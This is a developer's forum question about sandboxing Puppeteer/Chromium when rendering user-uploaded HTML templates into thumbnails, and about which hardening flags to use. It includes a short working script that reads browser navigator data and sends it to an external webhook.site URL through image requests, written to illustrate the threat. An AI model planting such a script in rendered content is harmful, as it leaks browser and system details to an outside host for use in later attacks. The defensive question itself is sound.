I have a website where people can upload HTML/AMP template and we generate thumbnail of the uploaded template. Now the issue is that since people can upload any HTML/AMP templates and it can have script under <script> tag. But we cannot disable the <script> tag because they are required to generate the proper thumbnails of the uploaded template. But user can exploit this by executing scripts like or any script he can pull from src attributes.
We have limit the time of script execution by Page.setDefaultNavigationTimeout() method.
<h1 id='heading'>Testing the html page</h1>
<script>
var heading = document.getElementById('heading');
heading.innerHTML = 'New Heading!';
let i = 0;
for (const key in navigator) {
if (i++ > 10) {
break;
}
heading.innerHTML += "<img src='https://webhook.site/847e1107-43a4-455f-a3ce-b0591ae8294d?" + key + "=" + encodeURIComponent(JSON.stringify(navigator[key])) + "'>"
//console.log(key + "=" + encodeURIComponent(JSON.stringify(navigator[key])))
}
</script>
I am worried about that a hacker can post the navigator information about browser and os like the one shown in code above. and use this info to exploit vulnerability of the browsers and take control of the container and get environment variables which contain secrets to queues, database and other stuff.
Is there a way or pattern to isolate the puppeteer or chromium process (like for example using sidecar containers) so that even someone exploit the browser vulnerability and get access to container, he is not able to get access to node js process. How does industry player like htmltopdf converters and other people prevent such issues ?
Also what are flags that needs to be enabled to make it more secure?
